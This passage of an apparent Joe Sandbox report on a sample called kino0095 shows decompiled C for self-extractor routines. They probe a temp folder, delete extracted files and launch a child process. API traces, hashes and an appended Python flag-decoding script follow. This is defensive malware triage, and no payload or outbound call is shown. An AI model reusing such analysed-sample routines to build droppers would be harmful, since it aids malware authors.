                                                                                                                                                                                                                                    								if(_t54 != 0) {
                                                                                                                                                                                                                                    									goto L32;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                    										_t59 = _t59 + 1;
                                                                                                                                                                                                                                    										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                    										_t41 =  *_t59;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                    							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                    								_t29 = 0xa;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_push(_t29);
                                                                                                                                                                                                                                    							_t30 = E010B2BFB(0x10b0000, 0, _t59); // executed
                                                                                                                                                                                                                                    							 *0x10b81e0 = _t30;
                                                                                                                                                                                                                                    							__eflags =  *0x10b81f8;
                                                                                                                                                                                                                                    							if( *0x10b81f8 == 0) {
                                                                                                                                                                                                                                    								exit(_t30); // executed
                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags =  *0x10b81e4;
                                                                                                                                                                                                                                    							if( *0x10b81e4 == 0) {
                                                                                                                                                                                                                                    								__imp___cexit();
                                                                                                                                                                                                                                    								_t30 =  *0x10b81e0; // 0x80070002
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                    							goto L40;
                                                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                                                    							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                    							if(_t41 == 0x22) {
                                                                                                                                                                                                                                    								__eflags = _t54;
                                                                                                                                                                                                                                    								_t15 = _t54 == 0;
                                                                                                                                                                                                                                    								__eflags = _t15;
                                                                                                                                                                                                                                    								_t54 = 0 | _t15;
                                                                                                                                                                                                                                    								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                    							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                    							__eflags = _t26;
                                                                                                                                                                                                                                    							if(_t26 != 0) {
                                                                                                                                                                                                                                    								_t59 = _t59 + 1;
                                                                                                                                                                                                                                    								__eflags = _t59;
                                                                                                                                                                                                                                    								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t59 = _t59 + 1;
                                                                                                                                                                                                                                    							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L40:
                                                                                                                                                                                                                                    					return E010B724D(_t30);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t58 = 1;
                                                                                                                                                                                                                                    				__eflags = 1;
                                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x010b6af4
                                                                                                                                                                                                                                    0x010b6afb
                                                                                                                                                                                                                                    0x010b6afb
                                                                                                                                                                                                                                    0x010b6af2
                                                                                                                                                                                                                                    0x010b6ac7
                                                                                                                                                                                                                                    0x010b6ac7
                                                                                                                                                                                                                                    0x010b6ac9
                                                                                                                                                                                                                                    0x010b6b0b
                                                                                                                                                                                                                                    0x010b6b0b
                                                                                                                                                                                                                                    0x010b6b11
                                                                                                                                                                                                                                    0x010b6b13
                                                                                                                                                                                                                                    0x010b6b18
                                                                                                                                                                                                                                    0x010b6b1d
                                                                                                                                                                                                                                    0x010b6b24
                                                                                                                                                                                                                                    0x010b6b24
                                                                                                                                                                                                                                    0x010b6b30
                                                                                                                                                                                                                                    0x010b6b39
                                                                                                                                                                                                                                    0x010b6b39
                                                                                                                                                                                                                                    0x010b6b3b
                                                                                                                                                                                                                                    0x010b6b42
                                                                                                                                                                                                                                    0x010b6b57
                                                                                                                                                                                                                                    0x010b6b5f
                                                                                                                                                                                                                                    0x010b6b65
                                                                                                                                                                                                                                    0x010b6b65
                                                                                                                                                                                                                                    0x010b6b67
                                                                                                                                                                                                                                    0x010b6b6c
                                                                                                                                                                                                                                    0x010b6b6e
                                                                                                                                                                                                                                    0x010b6b71
                                                                                                                                                                                                                                    0x010b6b74
                                                                                                                                                                                                                                    0x010b6b74
                                                                                                                                                                                                                                    0x010b6b79
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6b7d
                                                                                                                                                                                                                                    0x010b6b81
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6b83
                                                                                                                                                                                                                                    0x010b6b8c
                                                                                                                                                                                                                                    0x010b6b8d
                                                                                                                                                                                                                                    0x010b6b90
                                                                                                                                                                                                                                    0x010b6b90
                                                                                                                                                                                                                                    0x010b6b83
                                                                                                                                                                                                                                    0x010b6b81
                                                                                                                                                                                                                                    0x010b6b94
                                                                                                                                                                                                                                    0x010b6b98
                                                                                                                                                                                                                                    0x010b6ba2
                                                                                                                                                                                                                                    0x010b6b9a
                                                                                                                                                                                                                                    0x010b6b9a
                                                                                                                                                                                                                                    0x010b6b9a
                                                                                                                                                                                                                                    0x010b6ba3
                                                                                                                                                                                                                                    0x010b6bab
                                                                                                                                                                                                                                    0x010b6bb0
                                                                                                                                                                                                                                    0x010b6bb5
                                                                                                                                                                                                                                    0x010b6bbc
                                                                                                                                                                                                                                    0x010b6bbf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6bbf
                                                                                                                                                                                                                                    0x010b6c1e
                                                                                                                                                                                                                                    0x010b6c25
                                                                                                                                                                                                                                    0x010b6c27
                                                                                                                                                                                                                                    0x010b6c2d
                                                                                                                                                                                                                                    0x010b6c2d
                                                                                                                                                                                                                                    0x010b6c32
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6bc5
                                                                                                                                                                                                                                    0x010b6bc5
                                                                                                                                                                                                                                    0x010b6bc8
                                                                                                                                                                                                                                    0x010b6bcc
                                                                                                                                                                                                                                    0x010b6bce
                                                                                                                                                                                                                                    0x010b6bce
                                                                                                                                                                                                                                    0x010b6bd1
                                                                                                                                                                                                                                    0x010b6bd3
                                                                                                                                                                                                                                    0x010b6bd3
                                                                                                                                                                                                                                    0x010b6bd6
                                                                                                                                                                                                                                    0x010b6bda
                                                                                                                                                                                                                                    0x010b6be1
                                                                                                                                                                                                                                    0x010b6be3
                                                                                                                                                                                                                                    0x010b6be5
                                                                                                                                                                                                                                    0x010b6be5
                                                                                                                                                                                                                                    0x010b6be6
                                                                                                                                                                                                                                    0x010b6be6
                                                                                                                                                                                                                                    0x010b6be9
                                                                                                                                                                                                                                    0x010b6bea
                                                                                                                                                                                                                                    0x010b6bea
                                                                                                                                                                                                                                    0x010b6b74
                                                                                                                                                                                                                                    0x010b6c39
                                                                                                                                                                                                                                    0x010b6c3e
                                                                                                                                                                                                                                    0x010b6c3e
                                                                                                                                                                                                                                    0x010b6abe
                                                                                                                                                                                                                                    0x010b6abe
                                                                                                                                                                                                                                    0x00000000

APIs
  • Part of subcall function 010B7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010B7182
  • Part of subcall function 010B7155: GetCurrentProcessId.KERNEL32 ref: 010B7191
  • Part of subcall function 010B7155: GetCurrentThreadId.KERNEL32 ref: 010B719A
  • Part of subcall function 010B7155: GetTickCount.KERNEL32 ref: 010B71A3
  • Part of subcall function 010B7155: QueryPerformanceCounter.KERNEL32(?), ref: 010B71B8
• GetStartupInfoW.KERNEL32(?,010B72B8,00000058), ref: 010B6A7F
• Sleep.KERNEL32(000003E8), ref: 010B6AB4
• _amsg_exit.MSVCRT ref: 010B6AC9
• _initterm.MSVCRT ref: 010B6B1D
• __IsNonwritableInCurrentImage.LIBCMT ref: 010B6B49
• exit.KERNELBASE ref: 010B6BBF
• _ismbblead.MSVCRT ref: 010B6BDA
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
• String ID:
• API String ID: 836923961-0
• Opcode ID: 79a85bb50ab84ffec8b7a6a66cd8c5b2d3b7606538f87db974983aae7ab76497
• Instruction ID: 3f1d534246fbca8308b93a8b65bf56c878a1f4a746fd4867f778cdb1a9420aa2
• Opcode Fuzzy Hash: 79a85bb50ab84ffec8b7a6a66cd8c5b2d3b7606538f87db974983aae7ab76497
• Instruction Fuzzy Hash: 1841E531A04325DBEB719B6DE8D4BEE7BF8FB44710F14805AE9C197294CB7B48808B80
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 631 10b58c8-10b58d5 632 10b58d8-10b58dd 631->632 632->632 633 10b58df-10b58f1 LocalAlloc 632->633 634 10b5919-10b5959 call 10b1680 call 10b658a CreateFileA LocalFree 633->634 635 10b58f3-10b5901 call 10b44b9 633->635 639 10b5906-10b5910 call 10b6285 634->639 644 10b595b-10b596c CloseHandle GetFileAttributesA 634->644 635->639 645 10b5912-10b5918 639->645 644->639 646 10b596e-10b5970 644->646 646->639 647 10b5972-10b597b 646->647 647->645
C-Code - Quality: 95%
			E010B58C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;
				signed int _t36; // buffer size; the decompiler output used this without declaring it

				_push(__ecx);
				_t33 = __ecx; // __ecx: directory path (C:\Users\user\AppData\Local\Temp\IXP001.TMP\ in this run)
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do { // inline strlen over the directory path
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14; // path length plus room for "TMP4351$.TMP" and the terminator
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14); // 0x40 = LPTR: fixed, zero-initialised
				if(_t20 != 0) {
					E010B1680(_t20, _t36, _t33); // copy the directory path into the buffer
					E010B658A(_t20, _t36, "TMP4351$.TMP"); // append the probe file name
					// GENERIC_WRITE, CREATE_NEW, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_DELETE_ON_CLOSE:
					// the probe file disappears again as soon as its handle is closed
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) { // INVALID_HANDLE_VALUE: directory is not writable
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						// fail unless the path exists and carries FILE_ATTRIBUTE_DIRECTORY (0x10)
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x10b9124 = 0; // global at 0x10b9124 reset on success
							_t14 = 1; // success: directory exists and is writable
						}
					}
				} else {
					E010B44B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x10b9124 = E010B6285(); // global at 0x10b9124 set from E010B6285() on failure
					_t14 = 0;
				}
				return _t14;
			}
Instruction addresses for the listing above (the address column of the decompiled view, one entry per statement): 0x010b58cd 0x010b58d1 0x010b58d3 0x010b58d5 0x010b58d8 0x010b58d8 0x010b58da 0x010b58db 0x010b58e1 0x010b58ed 0x010b58f1 0x010b591e 0x010b592c 0x010b5943 0x010b594a 0x010b594d 0x010b5953 0x010b5959 0x00000000 0x010b595b 0x010b595c 0x010b5963 0x010b596c 0x00000000 0x010b5972 0x010b5974 0x010b597a 0x010b597a 0x010b596c 0x010b58f3 0x010b5901 0x010b5906 0x010b590b 0x010b5910 0x010b5910 0x010b5918

APIs
• LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,010B5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B58E7
• CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,010B5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B5943
• LocalFree.KERNEL32(00000000,?,010B5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B594D
• CloseHandle.KERNEL32(00000000,?,010B5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B595C
• GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,010B5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B5963
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
• API String ID: 747627703-2825630923
• Opcode ID: c211aeb82b27c28c7e5b5b84b94f2893cbb0c505a2ef6e05e5c8b324b4c9e80a
• Instruction ID: 5aba796a06a6c42249370a3dc3413028e52eb9ea2e7007fe37b6071649e93dc5
• Opcode Fuzzy Hash: c211aeb82b27c28c7e5b5b84b94f2893cbb0c505a2ef6e05e5c8b324b4c9e80a
• Instruction Fuzzy Hash: 2F1100717002117AD7701B7AACCCADB7E99DF86260B100A99B68AE31C4DA79980687A0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
Control-flow graph (rendered graph not reproduced; basic blocks with their successors):
648 10b52b6-10b52d4 -> 649, 650
649 10b5317-10b531f -> 652, 653
650 10b52d6 -> 651
651 10b52d7-10b52e0 -> 654, 655
652 10b5379-10b5381 -> 656, 657
653 10b5321-10b5328 -> 652, 658
654 10b52e2-10b52e9 -> 655, 659
655 10b5300-10b5314 LocalFree * 2 -> 651, 661
656 10b538c-10b53a0 call 10b6ce0
657 10b5383-10b5385 -> 656, 660
658 10b532a-10b5331 -> 652, 663
659 10b52eb-10b52fa SetFileAttributesA DeleteFileA -> 655
660 10b5387 call 10b1fe1 -> 656
661 10b5316 -> 649
663 10b5333-10b5351 call 10b1781 -> 668, 669
668 10b535e-10b536f SetCurrentDirectoryA call 10b2390 -> 672
669 10b5353-10b5359 call 10b65e8 -> 668
672 10b5374 -> 652
C-Code - Quality: 74%
E010B52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
	signed int _v8;
	char _v268;
	signed int _t9;
	signed int _t11;
	void* _t21;
	void* _t29;
	CHAR** _t31;
	void* _t32;
	signed int _t33;

	_t28 = __edi;
	_t22 = __ecx;
	_t21 = __ebx;
	_t9 =  *0x10b8004; // 0x72151d89
	_v8 = _t9 ^ _t33;
	_push(__esi);
	_t31 =  *0x10b91e0; // 0xef7a50
	if(_t31 != 0) {
		_push(__edi);
		do {
			_t29 = _t31;
			if( *0x10b8a24 == 0 &&  *0x10b9a30 == 0) {
				SetFileAttributesA( *_t31, 0x80); // executed
				DeleteFileA( *_t31); // executed
			}
			_t31 = _t31[1];
			LocalFree( *_t29);
			LocalFree(_t29);
		} while (_t31 != 0);
		_pop(_t28);
	}
	_t11 =  *0x10b8a20; // 0x0
	_pop(_t32);
	if(_t11 != 0 &&  *0x10b8a24 == 0 &&  *0x10b9a30 == 0) {
		_push(_t22);
		E010B1781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
		if(( *0x10b9a34 & 0x00000020) != 0) {
			E010B65E8( &_v268);
		}
		SetCurrentDirectoryA(".."); // executed
		_t22 =  &_v268;
		E010B2390( &_v268);
		_t11 =  *0x10b8a20; // 0x0
	}
	if( *0x10b9a40 != 1 && _t11 != 0) {
		_t11 = E010B1FE1(_t22); // executed
	}
	 *0x10b8a20 =  *0x10b8a20 & 0x00000000;
	return E010B6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
}

Instruction addresses: 0x010b52b6, 0x010b52b6, 0x010b52b6, 0x010b52c1, 0x010b52c8, 0x010b52cb, 0x010b52cc, 0x010b52d4, 0x010b52d6, 0x010b52d7, 0x010b52de, 0x010b52e0, 0x010b52f2, 0x010b52fa, 0x010b52fa, 0x010b5302, 0x010b5305, 0x010b530c, 0x010b5312, 0x010b5316, 0x010b5316, 0x010b5317, 0x010b531c, 0x010b531f, 0x010b5333, 0x010b5345, 0x010b5351, 0x010b5359, 0x010b5359, 0x010b5363, 0x010b5369, 0x010b536f, 0x010b5374, 0x010b5374, 0x010b5381, 0x010b5387, 0x010b5387, 0x010b538f, 0x010b53a0

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(00EF7A50,00000080,?,00000000), ref: 010B52F2
                                                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(00EF7A50), ref: 010B52FA
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00EF7A50,?,00000000), ref: 010B5305
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00EF7A50), ref: 010B530C
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(010B11FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010B5363
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Pz, xrefs: 010B52CC
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010B5334
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Pz
                                                                                                                                                                                                                                    • API String ID: 2833751637-2830093337
                                                                                                                                                                                                                                    • Opcode ID: c477356b2ebf758092a6e272af81fed65484109e04e330839048e8f0ad363d15
                                                                                                                                                                                                                                    • Instruction ID: efb5ccc72fa88908ad4efd5c3396f7f06596a067ed63f44e027a696bf206a1fd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c477356b2ebf758092a6e272af81fed65484109e04e330839048e8f0ad363d15
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1121A431512204DBEB719F14ECD8BE977F8FB14B14F0481D9E9C267298CBBA5984CB80
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 84%
	E010B3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
		/* Runs the command line in __ecx as a child process, waits for it to exit and
		   records its exit code. Returns 1 on success; 0 when CreateProcessA fails, or
		   when bit 0x400 of the global at 0x10b9a34 is set and the child's exit code is
		   negative. The trailing "@" comments carry the address column of the original
		   listing, one address per statement; they line up with the "ref:" addresses in
		   the APIs list below. */
		signed int _v8;                        // stack cookie copy (MSVC /GS pattern)
		char _v524;                            // 0x200-byte buffer for the FormatMessageA text
		long _v528;                            // child exit code
		struct _PROCESS_INFORMATION _v544;
		void* __ebx;
		void* __edi;
		void* __esi;
		signed int _t20;
		void* _t22;
		int _t25;
		signed int _t34;                       // not declared in the decompiler output
		intOrPtr* _t39;
		signed int _t44;
		intOrPtr _t45;                         // not declared in the decompiler output
		void* _t49;
		signed int _t50;
		intOrPtr _t53;

		_t45 = __edx;                                                   // @010b3fef
		_t20 =  *0x10b8004;                    // 0x72151d89            // @010b3ffa
		_v8 = _t20 ^ _t50;                                              // @010b4001
		_t39 = __ecx;                                                   // @010b4008
		_t49 = 1;                              // success by default    // @010b400a
		_t22 = 0;                                                       // @010b400b
		if(__ecx == 0) {                       // no command line       // @010b4010
			L13:                                                        // @010b410a
			return E010B6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);    // cookie check and epilogue @010b411a
		}                                                               // @010b411a
		asm("stosd");                          // four dword stores     // @010b401c
		asm("stosd");                          // zero the 16-byte      // @010b401d
		asm("stosd");                          // PROCESS_INFORMATION   // @010b401e
		asm("stosd");                          // in _v544              // @010b401f
		_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed; 0x20 = NORMAL_PRIORITY_CLASS, handles not inherited @010b4033
		if(_t25 == 0) {                                                 // @010b403b
			 *0x10b9124 = E010B6285();                                  // @010b40ca
			FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed; 0x1000 = FORMAT_MESSAGE_FROM_SYSTEM, text for the last error @010b40e9
			_t45 = 0x4c4;                                               // @010b40f8
			E010B44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);                // executed; command line and error text handed on @010b4101
			L11:                                                        // @010b4106
			_t49 = 0;                              // failure           // @010b4106
			L12:                                                        // @010b4108
			_t22 = _t49;                                                // @010b4108
			goto L13;
		}                                                               // @010b4108
		WaitForSingleObject(_v544.hProcess, 0xffffffff);                // INFINITE: block until the child exits @010b4049
		_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528);             // executed @010b405c
		_t44 = _v528;                                                   // @010b4062
		_t53 =  *0x10b8a28;                    // 0x0                   // @010b4068
		if(_t53 == 0) {                                                 // @010b406e
			_t34 =  *0x10b9a2c;                // 0x0                   // @010b4070
			if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {  // @010b4077
				_t34 = _t44 & 0xff000000;                               // @010b407f
				if((_t44 & 0xff000000) == 0xaa000000) {                 // only exit codes whose top byte is 0xAA are stored @010b4089
					 *0x10b9a2c = _t44;                                 // @010b408b
				}                                                       // @010b408b
			}                                                           // @010b4089
		}                                                               // @010b4077
		E010B411B(_t34, _t44);                                          // @010b4091
		CloseHandle(_v544.hThread);                                     // @010b409c
		CloseHandle(_v544);                    // first member, i.e. _v544.hProcess @010b40a8
		if(( *0x10b9a34 & 0x00000400) == 0 || _v528 >= 0) {             // @010b40b8
			goto L12;
		} else {                                                        // @010b40c2
			goto L11;
		}                                                               // @010b40c2
	}

APIs
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 010B4033
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 010B4049
• GetExitCodeProcess.KERNELBASE ref: 010B405C
• CloseHandle.KERNEL32(?), ref: 010B409C
• CloseHandle.KERNEL32(?), ref: 010B40A8
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010B40DC
• FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 010B40E9
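The API list above gives raw stack values, and the one that matters for triage is easy to misread: the sixth CreateProcessA argument, 00000020, is NORMAL_PRIORITY_CLASS, not CREATE_NEW_CONSOLE (which is 0x10), and the first FormatMessageA argument, 00001000, is FORMAT_MESSAGE_FROM_SYSTEM. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's own API lines (copied verbatim into the script) and decodes the flag-bearing arguments against the documented winbase.h constants. The regex, the `ApiCall` record and the helper names are the example's own; the flag tables cover only the subset of constants relevant here.

```python
import re
from dataclasses import dataclass

# API trace lines copied verbatim from the "APIs" list of this report.
REPORT_API_LINES = """\
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 010B4033
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 010B4049
• GetExitCodeProcess.KERNELBASE ref: 010B405C
• CloseHandle.KERNEL32(?), ref: 010B409C
• CloseHandle.KERNEL32(?), ref: 010B40A8
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010B40DC
• FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 010B40E9
"""

# Documented Win32 flag values (winbase.h); only the subset relevant here.
CREATION_FLAGS = {
    0x00000001: "DEBUG_PROCESS",
    0x00000002: "DEBUG_ONLY_THIS_PROCESS",
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x00000020: "NORMAL_PRIORITY_CLASS",
    0x00000040: "IDLE_PRIORITY_CLASS",
    0x00000080: "HIGH_PRIORITY_CLASS",
    0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT",
    0x01000000: "CREATE_BREAKAWAY_FROM_JOB",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}
FORMAT_MESSAGE_FLAGS = {
    0x00000100: "FORMAT_MESSAGE_ALLOCATE_BUFFER",
    0x00000200: "FORMAT_MESSAGE_IGNORE_INSERTS",
    0x00000400: "FORMAT_MESSAGE_FROM_STRING",
    0x00000800: "FORMAT_MESSAGE_FROM_HMODULE",
    0x00001000: "FORMAT_MESSAGE_FROM_SYSTEM",
    0x00002000: "FORMAT_MESSAGE_ARGUMENT_ARRAY",
}
# (API name, zero-based argument index) -> (parameter name, flag table)
FLAG_ARGUMENTS = {
    ("CreateProcessA", 5): ("dwCreationFlags", CREATION_FLAGS),
    ("FormatMessageA", 0): ("dwFlags", FORMAT_MESSAGE_FLAGS),
}

API_LINE = re.compile(
    r"^\W*(?P<name>\w+)\.(?P<module>\w+)"       # "• CreateProcessA.KERNELBASE"
    r"(?:\((?P<args>[^)]*)\))?"                 # optional "(arg,arg,...)"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"    # ", ref: 010B4033"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list      # int for a resolved stack value, None where the report shows '?'
    ref: int        # address of the call site


def parse_api_lines(text):
    """Parse the report's API list; lines that do not match the format are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line.strip())
        if not m:
            continue
        args = []
        if m.group("args"):
            for a in m.group("args").split(","):
                a = a.strip()
                args.append(None if a == "?" else int(a, 16))
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_flags(value, table):
    """Names of the set bits in ascending bit order; bits absent from the table are reported as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = 0
    for bit in table:
        known |= bit
    leftover = value & ~known & 0xFFFFFFFF
    if leftover:
        names.append("unknown:0x%08X" % leftover)
    return names


def decode_call(call):
    """{parameter: [flag names]} for the flag-bearing arguments of one call."""
    decoded = {}
    for (name, idx), (param, table) in FLAG_ARGUMENTS.items():
        if call.name == name and idx < len(call.args) and call.args[idx] is not None:
            decoded[param] = decode_flags(call.args[idx], table)
    return decoded


def summarize(calls):
    """One line per call: call-site address, module!API, and any decoded flag arguments."""
    lines = []
    for c in calls:
        flags = "; ".join("%s=%s" % (p, "|".join(v)) for p, v in decode_call(c).items())
        lines.append("%08X %s!%s%s" % (c.ref, c.module, c.name, (" " + flags) if flags else ""))
    return lines


if __name__ == "__main__":
    for line in summarize(parse_api_lines(REPORT_API_LINES)):
        print(line)
```

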